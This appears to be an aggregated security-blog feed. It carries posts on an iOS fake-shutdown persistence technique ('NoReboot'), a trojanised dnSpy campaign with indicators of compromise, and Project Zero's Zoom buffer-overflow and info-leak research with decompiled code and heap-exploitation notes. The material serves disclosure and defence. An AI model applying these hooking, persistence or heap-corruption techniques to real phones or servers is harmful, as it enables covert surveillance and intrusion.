Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

2Q21: New Year's Reflections

31 December 2021 at 10:24

This may be the most important proposition revealed by history: “At the time, no one knew what was coming.”

― Haruki Murakami, 1Q84

1Q84 sat on my shelf gathering dust for years after I bought it during a wildly-ambitious Amazon shopping spree. I promised myself that I would get round to reading it, but college offered far more immediate distractions.

I only started reading it in 2020, when a new phase of life – my first job! – triggered a burst of enthusiasm for fresh beginnings. I moved at a brisk pace, savouring Murakami’s knack for magical prose and weird similes (“His voice was hard and dry, reminding her of a desert plant that could survive a whole year on one day’s worth of rain.”) However, as a mysterious new virus crept, then leapt across the globe, I found myself slowing down. The fantastical plot filled with Little People and Air Chrysalises and two moons began to take on a degree of verisimilitude that pulled me out of the story.

Two-thirds into the book, one of the characters, a woman/fitness instructor/assassin named Aomame, isolates herself in a small apartment for months due to reasons outside of her control. Unable to even take a single step outside, she kills time by reading Proust (In Search of Lost Time), listening to the radio, and working out. She’s lost, trying to find her way back to a sense of normalcy. It felt too real; although I only had about a hundred pages left, I put the book back on the shelf.

The most-read New York Times story in 2021 labelled the pervasive sense of ennui as “languishing” – the indeterminable void between depression and flourishing. To combat this, it suggested rediscovering one’s “flow”.

I set three big learning goals for myself this year: artificial intelligence, vulnerability research, and Internet of Things.

I was lucky enough to snag a OpenAI’s GPT-3 beta invitation, and the tinkering that ensued eventually resulted in AI-powered phishing research that I presented with my colleagues at DEF CON and Black Hat USA. WIRED magazine covered the project in thankfully fairly nuanced terms.

In the meantime, I cut my teeth on basic exploitation with Offensive Security’s Exploit Developer course, which I then applied to my research to discover fresh Apache OpenOffice and Microsoft Office code execution bugs (The Register reported on my related HacktivityCon talk). Dipping my toes into the vulnerability research reminded me just how vast this ocean is; it’ll be a long time before I can even tread water.

Finally, I trained with my colleagues in beginner IoT/OT concepts, winning the DEF CON ICS CTF. One thing I noticed about this space is the lack of good online trainings (even the in-person ones are iffy); there’s a niche market opportunity here. My vulnerability research team discovered 8 new vulnerabilities in Synology’s Network Attached Storage devices in a (failed) bid for Pwn2Own glory. Still, I made some lemonade with an upcoming talk at ShmooCon on why no one pwned Synology at Pwn2Own and TianFu Cup. Spoiler: it’s not because Synology is unhackable.

I finished 1Q84 last week. At the end of the book, Aomame escapes the dangerous alternate dimension she’s trapped in by entering yet another dimension – sadly, there’s no way home, as Spiderman will tell you. I suspect that “same same but different” feeling will carry over to 2022 – even as we emerge from the great crisis, there will be no homecoming. We will have to deal with the strange new world we have stumbled into.

Whichever dimension we may be in, here’s wishing you and your loved ones a very happy new year.

Persistence without “Persistence”: Meet The Ultimate Persistence Bug – “NoReboot”

4 January 2022 at 20:49
Persistence without “Persistence”: Meet The Ultimate Persistence Bug – “NoReboot”

Mobile Attacker’s Mindset Series – Part II

Evaluating how attackers operate when there are no rules leads to discoveries of advanced detection and response mechanisms. ZecOps is proudly researching scenarios of attacks and sharing the information publicly for the benefit of all the mobile defenders out there.

iOs persistence is presumed to be the hardest bug to find. The attack surface is somewhat limited and constantly analyzed by Apple’s security teams.

Creativity is a key element of the hacker’s mindset. Persistence can be hard if the attackers play by the rules. As you may have guessed it already – attackers are not playing by the rules and everything is possible.

In part II of the Attacker’s Mindset blog we’ll go over the ultimate persistence bug: a bug that cannot be patched because it’s not exploiting any persistence bugs at all – only playing tricks with the human mind.

Meet “NoReboot”: The Ultimate Persistence Bug

We’ll dissect the iOS system and show how it’s possible to alter a shutdown event, tricking a user that got infected into thinking that the phone has been powered off, but in fact, it’s still running. The “NoReboot” approach simulates a real shutdown. The user cannot feel a difference between a real shutdown and a “fake shutdown”. There is no user-interface or any button feedback until the user turns the phone back “on”.

To demonstrate this technique, we’ll show a remote microphone & camera accessed after “turning off” the phone, and “persisting” when the phone will get back to a “powered on” state.

This blog can also be an excellent tutorial for anyone who may be interested in learning how to reverse engineer iOS.

Nowadays, many of us have tons of applications installed on our phones, and it is difficult to determine which among them is abusing our data and privacy. Constantly, our information is being collected, uploaded.

This story by Dan Goodin, speaks about an iOS malware discovered in-the-wild. One of the sentences in the article says: “The installed malware…can’t persist after a device reboot, … phones are disinfected as soon as they’re restarted.”.

The reality is actually a bit more complicated than that. As we will be able to demonstrate in this blog, we cannot, and should not, trust a “normal reboot”.

How Are We Supposed to Reboot iPhones?

According to Apple, a phone is rebooted by clicking on the Volume Down + Power button and dragging the slider.

Given that the iPhone has no internal fan and oftentimes it keeps its temperature cool, it’s not trivial to tell if our phones are running or not. For end-users, the most intuitive indicator that the phone is the feedback from the screen. We tap on the screen or click on the side button to wake up the screen.

Here is a list of physical feedback that constantly reminds us that the phone is powered on:

  • Ring/Sound from incoming calls and notifications
  • Touch feedback (3D touch)
  • Vibration (silent mode switch triggers a burst of vibration)
  • Screen
  • Camera indicator

“NoReboot”: Hijacking the Shutdown Event

Let’s see if we can disable all of the indicators above while keeping the phone with the trojan still running. Let’s start by hijacking the shutdown event, which involves injecting code into three daemons.

When you slide to power off, it is actually a system application /Applications/InCallService.app sending a shutdown signal to SpringBoard, which is a daemon that is responsible for the majority of the UI interaction.

We managed to hijack the signal by hooking the Objective-C method -[FBSSystemService shutdownWithOptions:]. Now instead of sending a shutdown signal to SpringBoard, it will notify both SpringBoard and backboardd to trigger the code we injected into them.

In backboardd, we will hide the spinning wheel animation, which automatically appears when SpringBoard stops running, the magic spell which does that is [[BKSDefaults localDefaults]setHideAppleLogoOnLaunch:1]. Then we make SpringBoard exit and block it from launching again. Because SpringBoard is responsible for responding to user behavior and interaction, without it, the device looks and feels as if it is not powered on. which is the perfect disguise for the purpose of mimicking a fake poweroff.

Example of SpringBoard respond to user’s interaction: Detects the long press action and evokes Siri

Despite that we disabled all physical feedback, the phone still remains fully functional and is capable of maintaining an active internet connection. The malicious actor could remotely manipulate the phone in a blatant way without worrying about being caught because the user is tricked into thinking that the phone is off, either being turned off by the victim or by malicious actors using “low battery” as an excuse. 

Later we will demonstrate eavesdropping through cam & mic while the phone is “off”. In reality, malicious actors can do anything the end-user can do and more. 

System Boot In Disguise

Now the user wants to turn the phone back on. The system boot animation with Apple’s logo can convince the end-user to believe that the phone has been turned off. 

When SpringBoard is not on duty, backboardd is in charge of the screen. According to the description we found on theiphonewiki regarding backboardd.

Ref: https://www.theiphonewiki.com/wiki/Backboardd

“All touch events are first processed by this daemon, then translated and relayed to the iOS application in the foreground”. We found this statement to be accurate. Moreover, backboardd not only relay touch events, also physical button click events. 

backboardd logs the exact time when a button is pressed down, and when it’s been released. 

With the help from cycript, We noticed a way that allows us to intercept that event with Objective-C Method Hooking. 

A _BKButtonEventRecord instance will be created and inserted into a global dictionary object BKEventSenderUsagePairDictionary.  We hook the insertion method when the user attempts to “turn on” the phone.

The file will unleash the SpringBoard and trigger a special code block in our injected dylib. What it does is to leverage local SSH access to gain root privilege, then we execute /bin/launchctl reboot userspace. This will exit all processes and restart the system without touching the kernel. The kernel remains patched. Hence malicious code won’t have any problem continuing to run after this kind of reboot.

The user will see the Apple Logo effect upon restarting. This is handled by backboardd as well. Upon launching the SpringBoard, the backboardd lets SpringBoard take over the screen.

From that point, the interactive UI will be presented to the user. Everything feels right as all processes have indeed been restarted. Non-persistent threats achieved “persistency” without persistence exploits.

Hijacking the Force Restart Event?

A user can perform a “force restart” by clicking rapidly on “Volume Up”, then “Volume Down”, then long press on the power button until the Apple logo appears.

We have not found an easy way to hijack the force restart event. This event is implemented at a much lower level. According to the post below, it is done at a hardware level. Following a brief search in the iOS kernel, we can confirm that we didn’t see what triggers the force-restart event. The good news is that it’s harder for malicious actors to disable force restart events, but at the same time end-users face a risk of data loss as the system does not have enough time to securely write data to disk in case of force-restart events.

Misleading Force Restart

Nevertheless, It is entirely possible for malicious actors to observe the user’s attempt to perform a  force-restart (via backboardd) and deliberately make the Apple logo appear a few seconds earlier, deceiving the user into releasing the button earlier than they were supposed to. Meaning that in this case, the end-user did not successfully trigger a force-restart.  We will leave this as an exercise for the reader.

Ref: https://support.apple.com/guide/iphone/force-restart-iphone-iph8903c3ee6/ios

NoReboot Proof of Concept

You can find the source code of NoReboot POC here.

Never trust a device to be off

Since iOS 15, Apple introduced a new feature allowing users to track their phone even when it’s been turned off. Malware researcher @naehrdine wrote a technical analysis on this feature and shared her opinion on “Security and privacy impact”. We agree with her on “Never trust a device to be off, until you removed its battery or even better put it into a Blender.”

Checking if your phone is compromised

ZecOps for Mobile leverages extended data collection and enables responding to security events. If you’d like to inspect your phone – please feel free to request a free trial here.

Fake dnSpy - 当黑客也不讲伍德

By: liuchuang
12 January 2022 at 13:06

前景提要

dnSpy是一款流行的用于调试,修改和反编译.NET程序的工具。网络安全研究人员在分析 .NET 程序或恶意软件时经常使用。

2022 年1月8日, BLEEPING COMPUTER 发文称, 有攻击者利用恶意的dnSpy针对网络安全研究人员和开发人员发起了一次攻击活动。@MalwareHunterTeam 发布推文披露了分发恶意dnSpy编译版本的Github仓库地址,该版本的dnSpy后续会安装剪切板劫持器, Quasar RAT, 挖矿木马等。

image

image_1

查看 dnSpy 官方版的 Git,发现该工具处于Archived状态,在2020年就已经停止更新,并且没有官方站点。
2022-01-11-19-15-52

攻击者正是借助这一点,通过注册 dnspy[.]net 域名, 设计一个非常精美的网站, 来分发恶意的dnSpy 程序。
image_2
同时购买Google搜索广告, 使该站点在搜索引擎的结果排名前列,以加深影响范围。
2022-01-11-19-19-54

截止 2022 年 1 月 9 日, 该网站已下线

样本分析

dnspy[.]net 下发的为 dnSpy 6.1.8 的修改版,该版本也是官方发布的最后一个版本。

通过修改dnSpy核心模块之一的dnSpy.dll入口代码来完成感染。

dnSpy.dll正常的入口函数如下:

image_3

修改的入口添加了一个内存加载的可执行程序

image_4-1

该程序名为dnSpy Reader

image_5

并经过混淆

image_6

后续会通过mshta下发一些挖矿,剪切板劫持器,RAT等
2022-01-11-19-27-48

Github

攻击者创建的两个 github 分别为:

  • https[:]//github[.]com/carbonblackz/dnSpy
  • https[:]//github[.]com/isharpdev/dnSpy

其中使用的用户名为:isharpdev 和 carbonblackz,请记住这个名字待会儿我们还会看到它

资产拓线

通过对dnspy[.]net的分析,我们发现一些有趣的痕迹进而可对攻击者进行资产拓线:

dnspy.net

域名 dnspy[.]net 注册时间为2021年4月14日。

image_7

该域名存在多个解析记录, 多数为 Cloudflare 提供的 cdn 服务, 然而在查看具体历史解析记录时,我们发现在12月13日- 01月03日该域名使用的IP为45.32.253[.]0 , 与其他几个Cloudflare CDN服务的IP不同,该IP仅有少量的映射记录。

image_8

查询该IP的PDNS记录, 可以发现该IP映射的域名大多数都疑似为伪造的域名, 且大部分域名已经下线。

image_9

这批域名部分为黑客工具/办公软件等下载站点,且均疑似为某些正常网站的伪造域名。

2022-01-11-20-02-22

以及披露事件中的dnspy.net域名, 基于此行为模式,我们怀疑这些域名均为攻击者所拥有的资产,于是对这批域名进行了进一步的分析。

关联域名分析

toolbase[.]co 为例, 该域名历史为黑客工具下载站点, 该网站首页的黑客工具解压密码为 “CarbonBlackz”, 与上传恶意 dnspy 的 Github 用户之一的名字相同。

image_10

该站点后续更新页面标题为 Combolist-Cloud , 与45.32.253[.]0解析记录中存在的combolist.cloud域名记录相同, 部分文件使用 mediafire 或 gofile 进行分发。

image_11

该域名疑似为combolist[.]top的伪造站点, combolist[.]top 是一个提供泄露数据的论坛。

image_12

torfiles[.]net也同样为一个软件下载站。

image_13

Windows-software[.]co以及windows-softeware[.]net均为同一套模板创建的下载站。

image_14

image_15

shortbase[.]net拥有同dnspy[.]net一样的CyberPanel安装页面.且日期均为2021年12月19日。

image_16

下图为dnspy[.]net在WaybackMachine记录中的CyberPanel的历史安装页面。

image_17

coolmint[.]net同样为下载站, 截止 2022 年1月12日依然可以访问.但下载链接仅仅是跳转到mega[.]nz

image_18

filesr[.]nettoolbase[.]co为同一套模板

image_19

此站点的About us 都未做修改,

image_20

该页面的内容则是从FileCR[.]com的About us页面修改而来

2022-01-11-19-57-10

filesr[.]net的软件使用dropbox进行分发,但当前链接均已失效

最后是zippyfiles[.]net, 该站点为黑客工具下载站
2022-01-11-19-53-30
我们还在reddit上发现了一个名为tuki1986的用户两个月前一直在推广toolbase[.]cozippyfiles[.]net站点。

2022-01-11-20-41-21
该用户在一年前推广的网站为bigwarez[.]net

2022-01-11-20-58-43-1
查看该网站的历史记录发现同样为一个工具下载站点,且关联有多个社交媒体账号。

2022-01-12-21-03-15
推特@Bigwarez2

2022-01-11-21-05-11
Facebook@software.download.free.mana

2022-01-11-21-06-54

该账号现在推广的网站为itools[.]digital,是一个浏览器插件的下载站。
2022-01-11-21-18-54

Facebook组@free.software.bigwarez

2022-01-11-21-14-23

领英 - 当前已经无法访问
@free-software-1055261b9

tumblr@bigwarez

2022-01-11-21-12-50

继续分析tuki1986的记录发现了另一个网站blackos[.]net

2022-01-11-21-24-33

该网站同样为黑客工具下载站点

2022-01-11-21-27-38

且在威胁情报平台标注有后门软件

2022-01-12-01-33-08

通过该网站发现有一个名为sadoutlook1992的用户,从18年即开始在各种黑客论坛里发布挂马的黑客工具。

2022-01-12-01-39-59
2022-01-12-01-40-42
2022-01-12-01-41-27

在其最新的活动中,下载链接为zippyfiles[.]net

2022-01-12-01-43-26

从恶意的Gihubt仓库及解压密码可知有一个用户名为”CarbonBlackz”, 使用搜索引擎检索该字符串, 发现在知名的数据泄露网站raidforums[.]com有名为“Carbonblackz”的用户。

image_23

同样的在俄语的黑灰产论坛里也注册有账号,这两个账号均未发布任何帖子和回复,疑似还未投入使用。

image_24

其还在越南最大的论坛中发布软件下载链接:

image_25

image_26

归因分析

通过查看这些域名的WHOIS信息发现, filesr[.]net的联系邮箱为[email protected]

image_22

查询该邮箱的信息关联到一位35岁,疑似来自俄罗斯的人员。

2022-01-12-00-40-11

carbon1986tuki1986这两个ID来看,1986疑似为其出生年份,同时也符合35岁的年龄。

根据这些域名的关联性,行为模式与类似的推广方式,我们认为这些域名与dnspy[.]net的攻击者属于同一批人。

2022-01-12-02-45-11

这是一个经过精心构建的恶意组织,其至少从2018年10月即开始行动,通过注册大量的网站,提供挂马的黑客工具/破解软件下载,并在多个社交媒体上进行推广,从而感染黑客,安全研究人员,软件开发者等用户,后续进行挖矿,窃取加密货币或通过RAT软件窃取数据等恶意行为。

结论

破解软件挂马已经屡见不鲜,但对于安全研究人员的攻击则更容易中招,因为一些黑客工具,分析工具的敏感行为更容易被杀软查杀,所以部分安全研究人员可能会关闭防病毒软件来避免烦人的警告。

虽然目前该组织相关的恶意网站,gihub仓库以及用于分发恶意软件的链接大部分已经失效.但安全研究人员和开发人员还是要时刻保持警惕。对于各种破解/泄露的黑客工具建议在虚拟环境下运行,开发类软件,办公软件要从官网或正规渠道下载,且建议使用正版.以避免造成不必要的损失。

IOCs

dnSpy.dll - f00e0affede6e0a533fd0f4f6c71264d

  • ip
ip:
45.32.253.0

  • domain
zippyfiles.net
windows-software.net
filesr.net
coolmint.net
windows-software.co
dnspy.net
torfiles.net
combolist.cloud
toolbase.co
shortbase.net
blackos.net
bigwarez.net
buysixes.com
itools.digital
4api.net

Malware Analysis: Ragnarok Ransomware

By: voidsec
28 April 2021 at 08:13

The analysed sample is a malware employed by the Threat Actor known as Ragnarok. The ransomware is responsible for files’ encryption and it is typically executed, by the actors themselves, on the compromised machines. The name of the analysed executable is xs_high.exe, but others have been found used by the same ransomware family (such as […]

The post Malware Analysis: Ragnarok Ransomware appeared first on VoidSec.

Planned Upcoming Classes

15 January 2022 at 09:38

Some people asked me if I had a schedule of trainings I plan to do in the coming months. Well, here it is. At this point I would like to gauge interest, and plan the course hours (time zone) to accommodate the majority of participants.

I am moving to classes that are partly full days and partly half days. The full day sessions are going to be recorded for the participants (so that if anyone misses something because of urgent work, inconvenient time zone, etc., the recording should help). The half days are not recorded, and should be easier to handle, since they are only about 4 hours long.

Here is the planned course list with dates (f=full day, all others are half-days). The cost is in USD (paid by individual / paid by a company):

  • COM Programming with C++ (3 days): April 25, 26, 27, 28, May 2, 3 (Cost: 700/1300)
  • Windows System Programming (5 days): May 16 (f), 17, 18, 19, 23 (f), 24, 25, 26 (Cost: 800/1500)
  • Windows Kernel Programming (4 days): June 6 (f), 8, 9, 13 (f), 14 (Cost: 800/1500)
  • Windows Internals (5 days): July 11 (f), 12, 13, 14, 18 (f), 19, 20, 21 (Cost: 800/1500)
  • Advanced Kernel Programming (New!) (4 days): September 12 (f), 13, 14, 15, 19, 20, 21 (Cost: 800/1500)

“Advanced Kernel Programming” is a new class I’m planning, suitable for those who participated in “Windows Kernel Programming” (or have equivalent knowledge). This course will cover file system mini-filters, NDIS filters, and the Windows Filtering Platform (WFP), along with other advanced programming techniques.

I may add more classes after September, but it’s too far from now to make such a commitment.

If you are interested in one or more of these classes, please write an email to [email protected], and provide your name, preferred contact email, and your time zone. It’s not a commitment on your part, you may change your mind later on, but it should be genuine, where the dates and topics work for you.

Also, if you have other classes you would be happy if I deliver, you are welcome to suggest them. No promises, of course, but if there is enough interest, I will consider creating and delivering them.

If you’d like a private class for your team, get in touch. Syllabi can be customized as needed.

Have a great year ahead!

Rings

zodiacon

Zooming in on Zero-click Exploits

By: Ryan
18 January 2022 at 17:28

Posted by Natalie Silvanovich, Project Zero


Zoom is a video conferencing platform that has gained popularity throughout the pandemic. Unlike other video conferencing systems that I have investigated, where one user initiates a call that other users must immediately accept or reject, Zoom calls are typically scheduled in advance and joined via an email invitation. In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user. However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface. The following post details my investigation into Zoom.

This analysis resulted in two vulnerabilities being reported to Zoom. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

Zoom Attack Surface Overview

Zoom’s main feature is multi-user conference calls called meetings that support a variety of features including audio, video, screen sharing and in-call text messages. There are several ways that users can join Zoom meetings. To start, Zoom provides full-featured installable clients for many platforms, including Windows, Mac, Linux, Android and iPhone. Users can also join Zoom meetings using a browser link, but they are able to use fewer features of Zoom. Finally, users can join a meeting by dialing phone numbers provided in the invitation on a touch-tone phone, but this only allows access to the audio stream of a meeting. This research focused on the Zoom client software, as the other methods of joining calls use existing device features.

Zoom clients support several communication features other than meetings that are available to a user’s Zoom Contacts. A Zoom Contact is a user that another user has added as a contact using the Zoom user interface. Both users must consent before they become Zoom Contacts. Afterwards, the users can send text messages to one another outside of meetings and start channels for persistent group conversations. Also, if either user hosts a meeting, they can invite the other user in a manner that is similar to a phone call: the other user is immediately notified and they can join the meeting with a single click. These features represent the zero-click attack surface of Zoom. Note that this attack surface is only available to attackers that have convinced their target to accept them as a contact. Likewise, meetings are part of the one-click attack surface only for Zoom Contacts, as other users need to click several times to enter a meeting.

That said, it’s likely not that difficult for a dedicated attacker to convince a target to join a Zoom call even if it takes multiple clicks, and the way some organizations use Zoom presents interesting attack scenarios. For example, many groups host public Zoom meetings, and Zoom supports a paid Webinar feature where large groups of unknown attendees can join a one-way video conference. It could be possible for an attacker to join a public meeting and target other attendees. Zoom also relies on a server to transmit audio and video streams, and end-to-end encryption is off by default. It could be possible for an attacker to compromise Zoom’s servers and gain access to meeting data.

Zoom Messages

I started out by looking at the zero-click attack surface of Zoom. Loading the Linux client into IDA, it appeared that a great deal of its server communication occurred over XMPP. Based on strings in the binary, it was clear that XMPP parsing was performed using a library called gloox. I fuzzed this library using AFL and other coverage-guided fuzzers, but did not find any vulnerabilities. I then looked at how Zoom uses the data provided over XMPP.

XMPP traffic seemed to be sent over SSL, so I located the SSL_write function in the binary based on log strings, and hooked it using Frida. The output contained many XMPP stanzas (messages) as well as other network traffic, which I analyzed to determine how XMPP is used by Zoom. XMPP is used for most communication between Zoom clients outside of meetings, such as messages and channels, and is also used for signaling (call set-up) when a Zoom Contact invites another Zoom Contact to a meeting.

I spent some time going through the client binary trying to determine how the client processes XMPP, for example, if a stanza contains a text message, how is that message extracted and displayed in the client. Even though the Zoom client contains many log strings, this was challenging, and I eventually asked my teammate Ned Williamson for help locating symbols for the client. He discovered that several old versions of the Android Zoom SDK contained symbols. While these versions are roughly five years old, and do not present a complete view of the client as they only include some libraries that it uses, they were immensely helpful in understanding how Zoom uses XMPP.

Application-defined tags can be added to gloox’s XMPP parser by extending the class StanzaExtension and implementing the method newInstance to define how the tag is converted into a C++ object. Parsed XMPP stanzas are then processed using the MessageHandler class. Application developers extend this class, implementing the method handleMessage with code that performs application functionality based on the contents of the stanza received. Zoom implements its XMPP handling in CXmppIMSession::handleMessage, which is a large function that is an entrypoint to most messaging and calling features. The final processing stage of many XMPP tags is in the class ns_zoom_messager::CZoomMMXmppWrapper, which contains many methods starting with ‘On’ that handle specific events. I spent a fair amount of time analyzing these code paths, but didn’t find any bugs. Interestingly, Thijs Alkemade and Daan Keuper released a write-up of their Pwn2Own bug after I completed this research, and it involved a vulnerability in this area.

RTP Processing

Afterwards, I investigated how Zoom clients process audio and video content. Like all other video conferencing systems that I have analyzed, it uses Real-time Transport Protocol (RTP) to transport this data. Based on log strings included in the Linux client binary, Zoom appears to use a branch of WebRTC for audio. Since I have looked at this library a great deal in previous posts, I did not investigate it further. For video, Zoom implements its own RTP processing and uses a custom underlying codec named Zealot (libzlt).

Analyzing the Linux client in IDA, I found what I believed to be the video RTP entrypoint, and fuzzed it using afl-qemu. This resulted in several crashes, mostly in RTP extension processing. I tried modifying the RTP sent by a client to reproduce these bugs, but it was not received by the device on the other side and I suspected the server was filtering it. I tried to get around this by enabling end-to-end encryption, but Zoom does not encrypt RTP headers, only the contents of RTP packets (as is typical of most RTP implementations).

Curious about how Zoom server filtering works, I decided to set up Zoom On-Premises Deployment. This is a Zoom product that allows customers to set up on-site servers to process their organization’s Zoom calls. This required a fair amount of configuration, and I ended up reaching out to the Zoom Security Team for assistance. They helped me get it working, and I greatly appreciate their contribution to this research.

Zoom On-Premises Deployments consist of two hosts: the controller and the Multimedia Router (MMR). Analyzing the traffic to each server, it became clear that the MMR is the host that transmits audio and video content between Zoom clients. Loading the code for the MMR process into IDA, I located where RTP is processed, and it indeed parses the extensions as a part of its forwarding logic and verifies them correctly, dropping any RTP packets that are malformed.

The code that processes RTP on the MMR appeared different than the code that I fuzzed on the device, so I set up fuzzing on the server code as well. This was challenging, as the code was in the MMR binary, which was not compiled as a relocatable binary (more on this later). This meant that I couldn’t load it as a library and call into specific offsets in the binary as I usually do to fuzz binaries that don’t have source code available. Instead, I compiled my own fuzzing stub that called the function I wanted to fuzz as a relocatable that defined fopen, and loaded it using LD_PRELOAD when executing the MMR binary. Then my code would take control of execution the first time that the MMR binary called fopen, and was able to call the function being fuzzed.

This approach has a lot of downsides, the biggest being that the fuzzing stub can’t accept command line parameters, execution is fairly slow and a lot of fuzzing tools don’t honor LD_PRELOAD on the target. That said, I was able to fuzz with code coverage using Mateusz Jurczyk’s excellent DrSanCov, with no results.

Packet Processing

When analyzing RTP traffic, I noticed that both Zoom clients and the MMR server process a great deal of packets that didn’t appear to be RTP or XMPP. Looking at the SDK with symbols, one library appeared to do a lot of serialization: libssb_sdk.so. This library contains a great deal of classes with the methods load_from and save_to defined with identical declarations, so it is likely that they all implement the same virtual class.

One parameter to the load_from methods is an object of class msg_db_t,  which implements a buffer that supports reading different data types. Deserialization is performed by load_from methods by reading needed data from the msg_db_t object, and serialization is performed by save_to methods by writing to it.

After hooking a few save_to methods with Frida and comparing the written output to data sent with SSL_write, it became clear that these serialization classes are part of the remote attack surface of Zoom. Reviewing each load_from method, several contained code similar to the following (from ssb::conf_send_msg_req::load_from).

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(

msg_db, &this->str_len, consume_bytes, error_out);

  str_len = this->str_len;

  if ( str_len )

  {

    mem = operator new[](str_len);

    out_len = 0;

    this->str_mem = mem;

    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db, mem, &out_len);

read_str_with_len is defined as follows.

int __fastcall ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db_t* msg, signed __int8 *mem,

unsigned int *len)

{

  if ( !msg->invalid )

  {

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(msg, len, (int)len, 0);

    if ( !msg->invalid )

    {

      if ( *len )

        ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read(msg, mem, *len, 0);

    }

  }

  return msg;

}

Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).

I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms. This vulnerability was assigned CVE-2021-34423 and fixed on November 24, 2021.

Looking at the code for the MMR server, I noticed that ssb::conf_send_msg_req::load_from, the class the vulnerability occurs in was also present on the MMR server. Since the MMR forwards Zoom meeting traffic from one client to another, it makes sense that it might also deserialize this packet type. I analyzed the MMR code in IDA, and found that deserialization of this class only occurs during Zoom Webinars. I purchased a Zoom Webinar license, and was able to crash my own Zoom MMR server by sending this packet. I was not willing to test a vulnerability of this type on Zoom’s public MMR servers, but it seems reasonably likely that the same code was also in Zoom’s public servers.

Looking further at deserialization, I noticed that all deserialized objects contain an optional field of type ssb::dyna_para_table_t, which is basically a properties table that allows a map of name strings to variant objects to be included in the deserialized object. The variants in the table are implemented by the structure ssb::variant_t, as follows.

struct variant{

char type;

short length;

var_data data;

};

union var_data{

        char i8;

        char* i8_ptr;

        short i16;

        short* i16_ptr;

        int i32;

        int* i32_ptr;

        long long i64;

        long long i64*;

};

The value of the type field corresponds to the width of the variant data (1 for 8-bit, 2 for 16-bit, 3 for 32-bit and 4 four 64-bit). The length field specifies whether the variant is an array and its length. If it has the value 0, the variant is not an array, and a numeric value is read from the data field based on its type. If the length field has any other value, the data field is cast to a pointer, an array of that size is read.

My immediate concern with this implementation was that it could be prone to type confusion. One possibility is that a numeric value could be confused with an array pointer, which would allow an attacker to create a variant with a pointer that they specify. However, both the client and MMR perform very aggressive type checks on variants they treat as arrays. Another possibility is that a pointer could be confused with a numeric value. This could allow an attacker to determine the address of a buffer they control if the value is ever returned to the attacker. I found a few locations in the MMR code where a pointer is converted to a numeric value in this way and logged, but nowhere that an attacker could obtain the incorrectly cast value. Finally, I looked at how array data is handled, and I found that there are several locations where byte array variants are converted to strings, however not all of them checked that the byte array has a null terminator. This meant that if these variants were converted to strings, the string could contain the contents of uninitialized memory.

Most of the time, packets sent to the MMR by one user are immediately forwarded to other users without being deserialized by the server. For some bugs, this is a useful feature, for example, it is what allows CVE-2021-34423 discussed earlier to be triggered on a client. However, an information leak in variants needs to occur on the server to be useful to an attacker. When a client deserializes an incoming packet, it is for use on the device, so even if a deserialized string contains sensitive information, it is unlikely that this information will be transmitted off the device. Meanwhile, the MMR exists expressly to transmit information from one user to another, so if a string gets deserialized, there is a reasonable chance that it gets sent to another user, or alters server behavior in an observable way. So, I tried to find a way to get the server to deserialize a variant and convert it to a string. I eventually figured out that when a user logs into Zoom in a browser, the browser can’t process serialized packets, so the MMR must convert them to strings so they can be accessed through web requests. Indeed, I found that if I removed the null terminator from the user_name variant, it would be converted to a string and sent to the browser as the user’s display name.

The vulnerability was assigned CVE-2021-34424 and fixed on November 24, 2021. I tested it on my own MMR as well as Zoom’s public MMR, and it worked and returned pointer data in both cases.

Exploit Attempt

I attempted to exploit my local MMR server with these vulnerabilities, and while I had success with portions of the exploit, I was not able to get it working. I started off by investigating the possibility of creating a client that could trigger each bug outside of the Zoom client, but client authentication appeared complex and I lacked symbols for this part of the code, so I didn’t pursue this as I suspected it would be very time-consuming. Instead, I analyzed the exploitability of the bugs by triggering them from a Linux Zoom client hooked with Frida.

I started off by investigating the impact of heap corruption on the MMR process. MMR servers run on CentOS 7, which uses a modern glibc heap, so exploiting heap unlinking did not seem promising. I looked into overwriting the vtable of a C++ object allocated on the heap instead.

 

I wrote several Frida scripts that hooked malloc on the server, and used them to monitor how incoming traffic affects allocation. It turned out that there are not many ways for an attacker to control memory allocation on an MMR server that are useful for exploiting this vulnerability. There are several packet types that an attacker can send to the server that cause memory to be allocated on the heap and then freed when processing is finished, but not as many where the attacker can trigger both allocation and freeing. Moreover, the MMR server performs different types of processing in separate threads that use unique heap arenas, so many areas of the code where this type of allocation is likely to occur, such as connection management, allocate memory in a different heap arena than the thread where the bug occurs. The only such allocations I could find that were made in the same arena were related to meeting set-up: when a user joins a meeting, certain objects are allocated on the heap, which are then freed when they leave the meeting. Unfortunately, these allocations are difficult to automate as they require many unique users accounts in order for the allocation to be performed repeatedly, and allocation takes an observable amount of time (seconds).

I eventually wrote Frida scripts that looked for free chunks of unusual sizes that bordered C++ objects with vtables during normal MMR operation. There were a few allocation sizes that met this criteria, and since CVE-2021-34423 allows for the size of the buffer that is overflowed to be specified by the attacker, I was able to corrupt the memory of the adjacent object. Unfortunately, heap verification was very robust, so in most cases, the MMR process would crash due to a heap verification error before a virtual call was made on the corrupted object. I eventually got around this by focusing on allocation sizes that are small enough to be stored in fastbins by the heap, as heap chunks that are stored in fastbins do not contain verifiable heap metadata. Chunks of size 58 turned out to be the best choice, and by triggering the bug with an allocation of that size, I was able to control the pointer of a virtual call about one in ten times I triggered the bug.

